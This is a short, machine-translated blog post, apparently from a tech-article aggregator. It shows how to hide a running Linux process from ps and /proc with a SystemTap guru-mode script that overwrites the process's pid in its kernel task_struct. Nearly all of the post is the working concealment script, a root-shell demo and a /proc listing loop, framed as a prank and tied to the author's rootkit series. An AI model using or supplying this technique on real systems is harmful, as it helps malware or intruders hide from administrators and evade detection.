Of Stack

One line of code teaches you how to hide the Linux process

  • 2021-08-21 22:05:54
  • OfStack

There are always friends who ask how to hide the Linux process, and I say to what extent do you want to hide it, whether it is hidden in the kernel or hidden in the user.

The whole discussion on the Internet is nothing more than hook dropping procfs or similar user-mode schemes, and it is inevitable to talk at length. I said that these scenes are too big and complicated. For those who want to see the effect immediately, they are discouraged from seeing such a pile of complicated things.

This article introduces an unconventional method to hide Linux process from users, with only one line of code:

Modify the pid of the process.

Note is small hidden, so, it is not worth countering, tease 1 senior meeting engineer to engage in a prank to play.
target->pid = 0x7fffffff;

The complete script is as follows: 


#!/usr/bin/stap -g
# hide.stp

global pid;

function hide(who:long)
%{
 struct task_struct *target;

 target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
 target->pid = 0x7fffffff;
%}

probe begin
{
 pid = $1
 hide(pid);
 exit();
}

Come on, come on, try 1: 


[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#

Use the following command to detect all binary files that can display processes: 


for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
 ls -l /proc/$pid/exe; 
done

If it's gone in procfs, ps can't be detected.

If you think stap in guru mode is strange, then you can write your own independent Linux kernel module, and adopt the method of returning after modification: 


target->pid = xxxx;
return -1;

Is it much simpler than various hook methods, so-called moving data without moving code!

Simply talk about the principle.

When the task is created, the procfs directory structure is registered according to its pid. When showing the procfs directory structure, traverse task list with its pid as key to find the procfs directory structure. 0x7fffffff (or any other reasonable value) is not registered at all and certainly cannot be displayed.

Not much to say.

Again, don't try to counter the method described in this article, because such a simple thing is not worth countering at all, haha, is it?

Refer to my previous Rootkit series to continue exploring the way Linux processes are largely hidden in the kernel. At the same time, I have given countermeasures for each method.

Related articles: